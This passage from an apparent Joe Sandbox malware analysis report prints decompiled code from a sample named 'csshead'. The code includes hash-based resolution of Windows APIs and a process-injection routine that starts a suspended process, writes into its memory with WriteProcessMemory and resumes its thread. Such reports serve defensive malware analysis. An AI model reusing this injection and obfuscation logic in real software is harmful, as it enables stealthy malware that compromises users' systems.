    				 *0x40b140 = E00401994(_v12, 0x95fb6a02);
    				 *0x40b334 = E00401994(_v12, 0x70f6fe31);
    				 *0x40b338 = E00401994(_v12, 0x399354ce);
    				 *0x40b128 = E00401994(_v12, 0xa45b370a);
    				 *0x40b208 = E00401994(_v12, 0x2b00b870);
    				 *0x40b1c4 = E00401994(_v12, 0x4fba916c);
    				 *0x40b2a4 = E00401994(_v12, 0xc54374f3);
    				 *0x40b2a0 = E00401994(_v12, 0x9c700049);
    				 *0x40b29c = E00401994(_v12, 0x4f6ca717);
    				 *0x40b2d8 = E00401994(_v12, 0x67ecde97);
    				 *0x40b2dc = E00401994(_v12, 0xfdc94385);
    				 *0x40b2e0 = E00401994(_v12, 0x68807354);
    				 *0x40b2e4 = E00401994(_v12, 0x84d25ea);
    				 *0x40b2e8 = E00401994(_v12, 0xfc7a6efd);
    				 *0x40b2ec = E00401994(_v12, 0x5550b067);
    				 *0x40b2f0 = E00401994(_v12, 0xaebea6a);
    				 *0x40b12c = E00401994(_v12, 0x46318ac7);
    				 *0x40b130 = E00401994(_v12, 0x49a1374a);
    				 *0x40b134 = E00401994(_v12, 0xae17c571);
    				 *0x40b150 = E00401994(_v12, 0xe61874b3);
    				 *0x40b154 = E00401994(_v12, 0x3a7a7478);
    				 *0x40b158 = E00401994(_v12, 0x533d3b41);
    				 *0x40b15c = E00401994(_v12, 0x99a4299d);
    				 *0x40b164 = E00401994(_v12, 0xbea0bf35);
    				 *0x40b168 = E00401994(_v12, 0x9d00a761);
    				 *0x40b188 = E00401994(_v12, 0x9abfb8a6);
    				 *0x40b194 = E00401994(_v12, 0x6b416786);
    				 *0x40b198 = E00401994(_v12, 0x774393e8);
    				 *0x40b19c = E00401994(_v12, 0x2ee4f10d);
    				 *0x40b1a0 = E00401994(_v12, 0x19f78c90);
    				 *0x40b1a4 = E00401994(_v12, 0xd89ad05);
    				 *0x40b1a8 = E00401994(_v12, 0xc930ea1e);
    				 *0x40b18c = E00401994(_v12, 0x5bc1d14f);
    				 *0x40b1e0 = E00401994(_v12, 0x77cd9567);
    				 *0x40b1f0 = E00401994(_v12, 0x32432444);
    				 *0x40b1f4 = E00401994(_v12, 0x279dead7);
    				 *0x40b1f8 = E00401994(_v12, 0x7b4842c1);
    				 *0x40b1fc = E00401994(_v12, 0xae52c609);
    				 *0x40b200 = E00401994(_v12, 0xbf78969c);
    				 *0x40b204 = E00401994(_v12, 0xbb74a4a2);
    				 *0x40b22c = E00401994(_v12, 0x464871f3);
    				 *0x40b190 = E00401994(_v12, 0x9bd6888f);
    				 *0x40b20c = E00401994(_v12, 0x5c17ec75);
    				 *0x40b210 = E00401994(_v12, 0x58fe7abe);
    				 *0x40b254 = E00401994(_v12, 0x768aa260);
    				 *0x40b25c = E00401994(_v12, 0xef0a25b7);
    				 *0x40b260 = E00401994(_v12, 0xbc262395);
    				 *0x40b264 = E00401994(_v12, 0xe8bf6dad);
    				 *0x40b268 = E00401994(_v12, 0x5cd9430);
    				 *0x40b26c = E00401994(_v12, 0xaef7cbf1);
    				 *0x40b274 = E00401994(_v12, 0x475587b7);
    				 *0x40b278 = E00401994(_v12, 0x3def91ba);
    				 *0x40b408 = E00401994(_v12, 0xda81bc58);
    				 *0x40b40c = E00401994(_v12, 0xf3b84f05);
    				 *0x40b410 = E00401994(_v12, 0x392b6027);
    				 *0x40b414 = E00401994(_v12, 0x7b2d2505);
    				 *0x40b314 = E00401994(_v12, 0xeeba5eba);
    				 *0x40b2a8 = E00401994(_v12, 0x89b968d2);
    				 *0x40b2c0 = E00401994(_v12, 0x7e92ca65);
    				 *0x40b2f4 = E00401994(_v12, 0x4c1077d6);
    				 *0x40b31c = E00401994(_v12, 0x84033deb);
    				 *0x40b320 = E00401994(_v12, 0x725cb0a1);
    				 *0x40b250 = E00401994(_v12, 0x52ac19c);
    				 *0x40b318 = E00401994(_v12, 0x23ebe98b);
    				 *0x40b464 = E00401994(_v12, 0x3b3ee0f9);
    				 *0x40b468 = E00401994(_v12, 0x8d5a50dc);
    				 *0x40b46c = E00401994(_v12, 0x8d5a50ca);
    				 *0x40b470 = E00401994(_v12, 0x5e7ee0d0);
    				 *0x40b474 = E00401994(_v12, 0x69260152);
    				 *0x40b478 = E00401994(_v12, 0x9c480e24);
    				 *0x40b47c = E00401994(_v12, 0x5aa7e70b);
    				 *0x40b488 = E00401994(_v12, 0xe74f57ee);
    				 *0x40b48c = E00401994(_v12, 0x2d40b8f0);
    				 *0x40b490 = E00401994(_v12, 0xae17c071);
    				 *0x40b494 = E00401994(_v12, 0x515be757);
    				 *0x40b49c = E00401994(_v12, 0x1297812c);
    				 *0x40b4a0 = E00401994(_v12, 0x2f2feeda);
    				 *0x40b4a4 = E00401994(_v12, 0x81f0f0df);
    				 *0x40b4a8 = E00401994(_v12, 0xf3fd1c3);
    				 *0x40b4ac = E00401994(_v12, 0xef48e03a);
    				 *0x40b4b0 = E00401994(_v12, 0xfb0730c);
    				 *0x40b4b4 = E00401994(_v12, 0xa9de6f5a);
    				 *0x40b4b8 = E00401994(_v12, 0x723eb0d5);
    				 *0x40b4bc = E00401994(_v12, 0x487fe16b);
    				 *0x40b4c0 = E00401994(_v12, 0x8f8f114);
    				 *0x40b4c4 = E00401994(_v12, 0x3d9972f5);
    				 *0x40b4c8 = E00401994(_v12, 0x6fb89af0);
    				 *0x40b4cc = E00401994(_v12, 0xc09d5d66);
    				 *0x40b4d0 = E00401994(_v12, 0x2ca2b7e6);
    				 *0x40b4d4 = E00401994(_v12, 0x7b88bf3b);
    				 *0x40b4d8 = E00401994(_v12, 0xaa1de02f);
    				 *0x40b4dc = E00401994(_v12, 0xa48d6762);
    				 *0x40b4e0 = E00401994(_v12, 0x3a35705f);
    				 *0x40b4e8 = E00401994(_v12, 0x697a6afe);
    				 *0x40b4ec = E00401994(_v12, 0x95902b19);
    				 *0x40b4f0 = E00401994(_v12, 0x1295012c);
    				 *0x40b4f4 = E00401994(_v12, 0x2891ae7a);
    				 *0x40b4f8 = E00401994(_v12, 0x831a3927);
    				 *0x40b23c = E00401994(_v12, 0xd0498cd4);
    				 *0x40c22c = E00401994(_v12, 0xd0498cc2);
    				_t492 =  *0x40a084; // 0x401bf0
    				_v12 = LoadLibraryA(_t492);
    				 *0x40b230 = E00401994(_v12, 0xa638ce5f);
    				 *0x40b234 = E00401994(_v12, 0xbc44a131);
    				 *0x40b238 = E00401994(_v12, 0xf6edf382);
    				_t500 =  *0x40a080; // 0x401be8
    				_v12 = LoadLibraryA(_t500);
    				 *0x40b2fc = E00401994(_v12, 0x1ab922bf);
    				 *0x40b2f8 = E00401994(_v12, 0xa8afd1f3);
    				 *0x40b300 = E00401994(_v12, 0xc6ce9b8a);
    				 *0x40b304 = E00401994(_v12, 0xf26817eb);
    				 *0x40b308 = E00401994(_v12, 0x7506e960);
    				 *0x40b30c = E00401994(_v12, 0xbf7efb5a);
    				 *0x40b310 = E00401994(_v12, 0x4baed1c8);
    				 *0x40b484 = E00401994(_v12, 0x7396104b);
    				 *0x40b480 = E00401994(_v12, 0xb800c8a6);
    				 *0x40b388 = E00401994(_v12, 0x8616ab9b);
    				 *0x40b38c = E00401994(_v12, 0xb4584dda);
    				 *0x40b1b4 = E00401994(_v12, 0x6c7f716f);
    				 *0x40b1b0 = E00401994(_v12, 0x252b53b);
    				 *0x40b2ac = E00401994(_v12, 0xd36ceaf0);
    				 *0x40b2b0 = E00401994(_v12, 0xd7a87c3a);
    				 *0x40b2b4 = E00401994(_v12, 0xc45d9631);
    				 *0x40b2b8 = E00401994(_v12, 0x4baed1de);
    				 *0x40b2bc = E00401994(_v12, 0x8ebef5b1);
    				 *0x40b270 = E00401994(_v12, 0xea3af0d7);
    				 *0x40b418 = E00401994(_v12, 0x484007c);
    				 *0x40b41c = E00401994(_v12, 0x58a81c29);
    				 *0x40b420 = E00401994(_v12, 0xcacd450);
    				 *0x40b424 = E00401994(_v12, 0xabbc680d);
    				 *0x40b42c = E00401994(_v12, 0x7cbd2247);
    				 *0x40b428 = E00401994(_v12, 0xbdb70517);
    				 *0x40b430 = E00401994(_v12, 0x1d6c998b);
    				 *0x40b434 = E00401994(_v12, 0xa2f65ba2);
    				 *0x40b438 = E00401994(_v12, 0xad4ffcd5);
    				 *0x40b43c = E00401994(_v12, 0xc8a274ac);
    				 *0x40b440 = E00401994(_v12, 0x5fda1871);
    				 *0x40b444 = E00401994(_v12, 0xc0d4187d);
    				_t564 = LoadLibraryA("Psapi"); // executed
    				_v12 = _t564;
    				 *0x40b4e4 = E00401994(_v12, 0x860331a8);
    				_t567 =  *0x40a0a4; // 0x401c40
    				_t568 = LoadLibraryA(_t567); // executed
    				_v12 = _t568;
    				 *0x40b178 = E00401994(_v12, 0xa60c5f05);
    				_t571 =  *0x40a0d0; // 0x401cac
    				_v12 = LoadLibraryA(_t571);
    				 *0x40b3ec = E00401994(_v12, 0x5af0017c);
    				 *0x40b3f0 = E00401994(_v12, 0x5e10f525);
    				 *0x40b3f4 = E00401994(_v12, 0x48b87efc);
    				 *0x40b3f8 = E00401994(_v12, 0xdf91a857);
    				 *0x40b3fc = E00401994(_v12, 0x9e90b462);
    				 *0x40b400 = E00401994(_v12, 0x4894dafc);
    				 *0x40b404 = E00401994(_v12, 0x59012669);
    				_t587 =  *0x40a0e0; // 0x401d08
    				_v12 = LoadLibraryA(_t587);
    				 *0x40b330 = E00401994(_v12, 0xb9d41c2f);
    				 *0x40b1b8 = E00401994(_v12, 0xb96ca1c0);
    				 *0x40b1c0 = E00401994(_v12, 0x28e9e291);
    				 *0x40b1c8 = E00401994(_v12, 0x1d1f334a);
    				 *0x40b1cc = E00401994(_v12, 0x5cb5ef72);
    				 *0x40b2c8 = E00401994(_v12, 0xce303c3a);
    				 *0x40b2c4 = E00401994(_v12, 0x3e68cfc6);
    				 *0x40b2cc = E00401994(_v12, 0xd4ecc759);
    				 *0x40b2d0 = E00401994(_v12, 0xd21e3d01);
    				 *0x40b2d4 = E00401994(_v12, 0xad0c9f7e);
    				 *0x40b4fc = E00401994(_v12, 0x8ad7de34);
    				 *0x40b500 = E00401994(_v12, 0x78660dbe);
    				 *0x40b504 = E00401994(_v12, 0xcebf13be);
    				 *0x40b508 = E00401994(_v12, 0xd4b3d42);
    				 *0x40b50c = E00401994(_v12, 0x72760bb8);
    				 *0x40b448 = E00401994(_v12, 0x3c4de260);
    				 *0x40b44c = E00401994(_v12, 0xf837a387);
    				 *0x40b450 = E00401994(_v12, 0xc3f46335);
    				 *0x40b454 = E00401994(_v12, 0xa5ffa46e);
    				 *0x40b458 = E00401994(_v12, 0x453db143);
    				 *0x40b45c = E00401994(_v12, 0x37a53419);
    				 *0x40b460 = E00401994(_v12, 0xcebf17e6);
    				 *0x40b17c = E00401994(_v12, 0xaad67ff8);
    				 *0x40b180 = E00401994(_v12, 0x3ef2d3dd);
    				 *0x40b184 = E00401994(_v12, 0x90a097e6);
    				 *0x40b16c = E00401994(_v12, 0x7a2167dc);
    				 *0x40b170 = E00401994(_v12, 0x1b3d12b9);
    				 *0x40b174 = E00401994(_v12, 0x80dbbe07);
    				 *0x40b1ac = E00401994(_v12, 0x398c5285);
    				 *0x40b1dc = E00401994(_v12, 0x560c7c4a);
    				 *0x40b1d8 = E00401994(_v12, 0xdb355534);
    				 *0x40b1d4 = E00401994(_v12, 0x3e400fd6);
    				 *0x40b1e4 = E00401994(_v12, 0xee6ab5d);
    				 *0x40b1e8 = E00401994(_v12, 0x1802e7c8);
    				 *0x40b1ec = E00401994(_v12, 0xf65a7d95);
    				 *0x40b224 = E00401994(_v12, 0xb8538a52);
    				 *0x40b228 = E00401994(_v12, 0xccd03c3a);
    				 *0x40b328 = E00401994(_v12, 0x6d523bdd);
    				 *0x40b32c = E00401994(_v12, 0xf2f9de08);
    				 *0x40b324 = E00401994(_v12, 0xce30283a);
    				_t669 =  *0x40a094; // 0x401c20
    				_v12 = LoadLibraryA(_t669);
    				 *0x40b214 = E00401994(_v12, 0x3caa9945);
    				 *0x40b218 = E00401994(_v12, 0x5a56b493);
    				 *0x40b258 = E00401994(_v12, 0x7dfb3ef0);
    				_t677 =  *0x40a088; // 0x401bf8
    				_v12 = LoadLibraryA(_t677);
    				 *0x40b14c = E00401994(_v12, 0xf2276995);
    				 *0x40b21c = E00401994(_v12, 0xc95d8550);
    				 *0x40b220 = E00401994(_v12, 0x570bc899);
    				_t685 =  *0x40a098; // 0x401c28
    				_v12 = LoadLibraryA(_t685);
    				 *0x40b27c = E00401994(_v12, 0x368435be);
    				 *0x40b280 = E00401994(_v12, 0xf341d5cf);
    				 *0x40b284 = E00401994(_v12, 0xedb3159d);
    				_t693 =  *0x40a1b8; // 0x401eec
    				_v12 = LoadLibraryA(_t693);
    				 *0x40b288 = E00401994(_v12, 0x3184919f);
    				 *0x40b28c = E00401994(_v12, 0x39aedd1b);
    				_t699 =  *0x40a0a0; // 0x401c38
    				_t700 = LoadLibraryA(_t699); // executed
    				_v12 = _t700;
    				 *0x40b290 = E00401994(_v12, 0x8a94f707);
    				 *0x40b294 = E00401994(_v12, 0x7aa45c7a);
    				 *0x40b298 = E00401994(_v12, 0x4e26c00f);
    				_t707 =  *0x40a0cc; // 0x401ca4
    				_t708 = LoadLibraryA(_t707); // executed
    				_v12 = _t708;
    				 *0x40b33c = E00401994(_v12, 0x233e6d0f);
    				_t712 = E00401994(_v12, 0xbf821ad);
    				 *0x40b340 = _t712;
    				if(_v8 != 0) {
    					_t713 =  *0x40a1b0; // 0x401edc
    					_v12 = LoadLibraryA(_t713);
    					 *0x40b34c = E00401994(_v12, 0xd939f838);
    					 *0x40b344 = E00401994(_v12, 0x9400a044);
    					 *0x40b348 = E00401994(_v12, 0xee9bf475);
    					 *0x40b3a4 = E00401994(_v12, 0xe797764);
    					 *0x40b3a8 = E00401994(_v12, 0xedd8fe8a);
    					 *0x40b3ac = E00401994(_v12, 0xe5971f6);
    					 *0x40b3b0 = E00401994(_v12, 0x5d99726a);
    					 *0x40b3b4 = E00401994(_v12, 0x1f935b1d);
    					 *0x40b3b8 = E00401994(_v12, 0xfc7af16a);
    					 *0x40b3bc = E00401994(_v12, 0x939d7d9c);
    					 *0x40b3c0 = E00401994(_v12, 0xcdde757d);
    					 *0x40b3c4 = E00401994(_v12, 0xc5a7764);
    					 *0x40b3c8 = E00401994(_v12, 0x9e7d3188);
    					 *0x40b3cc = E00401994(_v12, 0x3c797b7a);
    					 *0x40b3d0 = E00401994(_v12, 0x4dfc1f3b);
    					 *0x40b3d4 = E00401994(_v12, 0x8e9bf775);
    					 *0x40b3d8 = E00401994(_v12, 0x8fb8b5bd);
    					 *0x40b3dc = E00401994(_v12, 0xb909d088);
    					 *0x40b3e0 = E00401994(_v12, 0xf44318c6);
    					 *0x40b3e4 = E00401994(_v12, 0x95e4a5d7);
    					_t755 =  *0x40a1b4; // 0x401ee4
    					_v12 = LoadLibraryA(_t755);
    					 *0x40b13c = E00401994(_v12, 0xaa91290b);
    					 *0x40b350 = E00401994(_v12, 0x8593dd7);
    					 *0x40b354 = E00401994(_v12, 0x6ae49924);
    					 *0x40b358 = E00401994(_v12, 0x7314fb0c);
    					 *0x40b35c = E00401994(_v12, 0xb87dbd66);
    					 *0x40b360 = E00401994(_v12, 0x2f5ce027);
    					 *0x40b364 = E00401994(_v12, 0xa3a80ab6);
    					 *0x40b368 = E00401994(_v12, 0xddcb15d);
    					 *0x40b36c = E00401994(_v12, 0x8733d614);
    					 *0x40b370 = E00401994(_v12, 0xfde87743);
    					 *0x40b390 = E00401994(_v12, 0x1a212962);
    					 *0x40b394 = E00401994(_v12, 0x9f13856a);
    					 *0x40b398 = E00401994(_v12, 0xbe618d3e);
    					 *0x40b39c = E00401994(_v12, 0x1510002f);
    					 *0x40b3a0 = E00401994(_v12, 0x7edec584);
    					 *0x40b380 = E00401994(_v12, 0xaa912901);
    					 *0x40b374 = E00401994(_v12, 0x2ae71934);
    					 *0x40b378 = E00401994(_v12, 0x1ad09c78);
    					 *0x40b37c = E00401994(_v12, 0x9ef6461);
    					_t712 = E00401994(_v12, 0x57fbc0dd);
    					 *0x40b3e8 = _t712;
    				}
    				return _t712;
    			}

    Instruction addresses of the statements above
    0x0040257a
    0x00402582
    0x00402592
    0x004025a4
    0x004025b6
    0x004025c8
    0x004025da
    0x004025ec
    0x004025fe
    0x00402610
    0x00402622
    0x00402634
    0x00402646
    0x00402658
    0x0040266a
    0x0040267c
    0x0040268e
    0x004026a0
    0x004026b2
    0x004026c4
    0x004026d6
    0x004026e8
    0x004026fa
    0x0040270c
    0x0040271e
    0x00402730
    0x00402742
    0x00402754
    0x00402766
    0x00402778
    0x0040278a
    0x0040279c
    0x004027ae
    0x004027c0
    0x004027d2
    0x004027e4
    0x004027f6
    0x00402808
    0x0040281a
    0x0040282c
    0x0040283e
    0x00402850
    0x00402862
    0x00402874
    0x00402886
    0x00402898
    0x004028aa
    0x004028bc
    0x004028ce
    0x004028e0
    0x004028f2
    0x00402904
    0x00402916
    0x00402928
    0x0040293a
    0x0040294c
    0x0040295e
    0x00402970
    0x00402982
    0x00402994
    0x004029a6
    0x004029b8
    0x004029ca
    0x004029dc
    0x004029ee
    0x00402a00
    0x00402a12
    0x00402a24
    0x00402a36
    0x00402a48
    0x00402a5a
    0x00402a6c
    0x00402a7e
    0x00402a90
    0x00402aa2
    0x00402ab4
    0x00402ac6
    0x00402ad8
    0x00402aea
    0x00402afc
    0x00402b0e
    0x00402b20
    0x00402b32
    0x00402b44
    0x00402b56
    0x00402b68
    0x00402b7a
    0x00402b8c
    0x00402b9e
    0x00402bb0
    0x00402bc2
    0x00402bd4
    0x00402be6
    0x00402bf8
    0x00402c0a
    0x00402c1c
    0x00402c2e
    0x00402c40
    0x00402c52
    0x00402c64
    0x00402c76
    0x00402c88
    0x00402c9a
    0x00402cac
    0x00402cbe
    0x00402cd0
    0x00402ce2
    0x00402cf4
    0x00402d06
    0x00402d18
    0x00402d2a
    0x00402d3c
    0x00402d4e
    0x00402d53
    0x00402d5f
    0x00402d6f
    0x00402d81
    0x00402d93
    0x00402d98
    0x00402da4
    0x00402db4
    0x00402dc6
    0x00402dd8
    0x00402dea
    0x00402dfc
    0x00402e0e
    0x00402e20
    0x00402e32
    0x00402e44
    0x00402e56
    0x00402e68
    0x00402e7a
    0x00402e8c
    0x00402e9e
    0x00402eb0
    0x00402ec2
    0x00402ed4
    0x00402ee6
    0x00402ef8
    0x00402f0a
    0x00402f1c
    0x00402f2e
    0x00402f40
    0x00402f52
    0x00402f64
    0x00402f76
    0x00402f88
    0x00402f9a
    0x00402fac
    0x00402fbe
    0x00402fd0
    0x00402fda
    0x00402fe0
    0x00402ff0
    0x00402ff5
    0x00402ffb
    0x00403001
    0x00403011
    0x00403016
    0x00403022
    0x00403032
    0x00403044
    0x00403056
    0x00403068
    0x0040307a
    0x0040308c
    0x0040309e
    0x004030a3
    0x004030af
    0x004030bf
    0x004030d1
    0x004030e3
    0x004030f5
    0x00403107
    0x00403119
    0x0040312b
    0x0040313d
    0x0040314f
    0x00403161
    0x00403173
    0x00403185
    0x00403197
    0x004031a9
    0x004031bb
    0x004031cd
    0x004031df
    0x004031f1
    0x00403203
    0x00403215
    0x00403227
    0x00403239
    0x0040324b
    0x0040325d
    0x0040326f
    0x00403281
    0x00403293
    0x004032a5
    0x004032b7
    0x004032c9
    0x004032db
    0x004032ed
    0x004032ff
    0x00403311
    0x00403323
    0x00403335
    0x00403347
    0x00403359
    0x0040336b
    0x0040337d
    0x00403382
    0x0040338e
    0x0040339e
    0x004033b0
    0x004033c2
    0x004033c7
    0x004033d3
    0x004033e3
    0x004033f5
    0x00403407
    0x0040340c
    0x00403418
    0x00403428
    0x0040343a
    0x0040344c
    0x00403451
    0x0040345d
    0x0040346d
    0x0040347f
    0x00403484
    0x0040348a
    0x00403490
    0x004034a0
    0x004034b2
    0x004034c4
    0x004034c9
    0x004034cf
    0x004034d5
    0x004034e5
    0x004034f2
    0x004034f7
    0x00403500
    0x00403506
    0x00403512
    0x00403522
    0x00403534
    0x00403546
    0x00403558
    0x0040356a
    0x0040357c
    0x0040358e
    0x004035a0
    0x004035b2
    0x004035c4
    0x004035d6
    0x004035e8
    0x004035fa
    0x0040360c
    0x0040361e
    0x00403630
    0x00403642
    0x00403654
    0x00403666
    0x00403678
    0x0040367d
    0x00403689
    0x00403699
    0x004036ab
    0x004036bd
    0x004036cf
    0x004036e1
    0x004036f3
    0x00403705
    0x00403717
    0x00403729
    0x0040373b
    0x0040374d
    0x0040375f
    0x00403771
    0x00403783
    0x00403795
    0x004037a7
    0x004037b9
    0x004037cb
    0x004037dd
    0x004037ea
    0x004037ef
    0x004037ef
    0x00403858

    APIs
    • LoadLibraryA.KERNEL32(00401BF0), ref: 00402D59
    • LoadLibraryA.KERNEL32(00401BE8), ref: 00402D9E
    • LoadLibraryA.KERNELBASE(Psapi), ref: 00402FDA
    • LoadLibraryA.KERNELBASE(00401C40), ref: 00402FFB
    • LoadLibraryA.KERNEL32(00401CAC), ref: 0040301C
    • LoadLibraryA.KERNEL32(00401D08), ref: 004030A9
    • LoadLibraryA.KERNEL32(00401C20), ref: 00403388
    • LoadLibraryA.KERNEL32(00401BF8), ref: 004033CD
    • LoadLibraryA.KERNEL32(00401C28), ref: 00403412
    • LoadLibraryA.KERNEL32(00401EEC), ref: 00403457
    • LoadLibraryA.KERNELBASE(00401C38), ref: 0040348A
    • LoadLibraryA.KERNELBASE(00401CA4), ref: 004034CF
    • LoadLibraryA.KERNEL32(00401EDC), ref: 0040350C
    • LoadLibraryA.KERNEL32(00401EE4), ref: 00403683
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1297 4260a2-4260b4 GetModuleHandleW 1298 4260b6-4260be call 425d81 1297->1298 1299 4260bf-426107 GetProcAddress * 4 1297->1299 1300 426109-426110 1299->1300 1301 42611f-42613e 1299->1301 1300->1301 1304 426112-426119 1300->1304 1303 426143-426151 TlsAlloc 1301->1303 1306 426218 1303->1306 1307 426157-426162 TlsSetValue 1303->1307 1304->1301 1308 42611b-42611d 1304->1308 1310 42621a-42621c 1306->1310 1307->1306 1309 426168-4261ae call 4243ec RtlEncodePointer * 4 call 42bf11 1307->1309 1308->1301 1308->1303 1315 4261b0-4261cd RtlDecodePointer 1309->1315 1316 426213 call 425d81 1309->1316 1315->1316 1319 4261cf-4261e1 call 42a124 1315->1319 1316->1306 1319->1316 1322 4261e3-4261f0 RtlDecodePointer 1319->1322 1323 4261f4-4261f6 1322->1323 1323->1316 1324 4261f8-426211 call 425dbe GetCurrentThreadId 1323->1324 1324->1310
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
    • TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
    • TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
    • RtlEncodePointer.NTDLL ref: 00426179
    • RtlEncodePointer.NTDLL ref: 00426186
    • RtlEncodePointer.NTDLL ref: 00426193
    • RtlEncodePointer.NTDLL ref: 004261A0
      • Part of subcall function 0042BF11: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042BF39
    • RtlDecodePointer.NTDLL(Function_00015F05), ref: 004261C1
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000), ref: 004261F0
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • GetCurrentThreadId.KERNEL32 ref: 00426202
      • Part of subcall function 00425D81: RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
      • Part of subcall function 00425D81: TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC
      • Part of subcall function 00425D81: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0042BF78
      • Part of subcall function 00425D81: RtlDeleteCriticalSection.NTDLL(00442050), ref: 0042BFA2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 1327 405028-40503c 1328 40503e-405046 GetModuleHandleA 1327->1328 1329 405049-40504d 1327->1329 1328->1329 1330 40504f-405053 1329->1330 1331 405061-40509d call 401258 CreateProcessA 1329->1331 1330->1331 1333 405055-40505e call 4012dc 1330->1333 1337 4050a3-40517f call 4010b4 call 401164 call 40133c CreateFileMappingA MapViewOfFile call 4012b8 * 2 call 4013b4 call 4012b8 1331->1337 1338 4052ce-4052d4 1331->1338 1333->1331 1353 405181-405185 1337->1353 1354 4051a5-4051e2 call 4012dc call 4012b8 call 404ef0 1337->1354 1356 40518c-4051a3 1353->1356 1362 4051e4-405211 call 401258 GetThreadContext 1354->1362 1363 405225-405229 1354->1363 1356->1354 1356->1356 1362->1363 1372 405213-40521a 1362->1372 1365 40522b-405233 call 404de0 1363->1365 1366 405236-40523a 1363->1366 1365->1366 1366->1338 1367 405240-405288 VirtualProtectEx WriteProcessMemory call 401828 ResumeThread 1366->1367 1375 4052b5-4052b7 1367->1375 1376 40528a-40529a WaitForSingleObject 1367->1376 1372->1363 1374 40521c-405222 1372->1374 1374->1363 1379 4052ba-4052c8 CloseHandle * 2 1375->1379 1377 40529c-4052aa GetExitCodeProcess 1376->1377 1378 4052ac-4052b3 1376->1378 1377->1379 1378->1379 1379->1338
    C-Code - Quality: 98%
    			E00405028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t125;
    				void* _t127;
    				void* _t144;
    				long _t154;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E004012DC(_a16) + 1;
    				}
    				E00401258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L22:
    					return _v8;
    				}
    				E00401164(E004010B4(_t109, 0x44),  &_v353);
    				E0040133C( &_v353, "_section");
    				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    				_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
    				_v12 = _t125;
    				_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
    				_v16 = _t127;
    				E004012B8(_v16, _v24, _a8);
    				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    				E004012B8(_v16 + _v24 + 8, _a20, _a16);
    				_v24 = 0x29b;
    				E004013B4( &_v28, _v24 + 0x11); // executed
    				E004012B8(_v28, _v24, 0x40a2ac);
    				_t144 = _v24 - 1;
    				if(_t144 < 0) {
    					L9:
    					_v20 = E004012DC( &_v353) + 1;
    					E004012B8(_v28 + _v24, _v20,  &_v353);
    					_v24 = _v24 + _v20;
    					_v40 = 0;
    					_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t224); // executed
    					_v40 = _t154;
    					if(_v40 == 0) {
    						E00401258( &_v332, 0xcc);
    						_v332.ContextFlags = 0x10007;
    						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    							_v40 = _v332.Eax;
    						}
    					}
    					_t228 = _v40;
    					if(_v40 == 0) {
    						_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t228);
    					}
    					if(_v40 != 0) {
    						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
    						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
    						E00401828(_v28); // executed
    						ResumeThread(_v124); // executed
    						if(_a24 == 0) {
    							__eflags = 0;
    							_v8 = 0;
    						} else {
    							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    								_v8 = 0xfffffffe;
    							} else {
    								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    							}
    						}
    						CloseHandle(_v124);
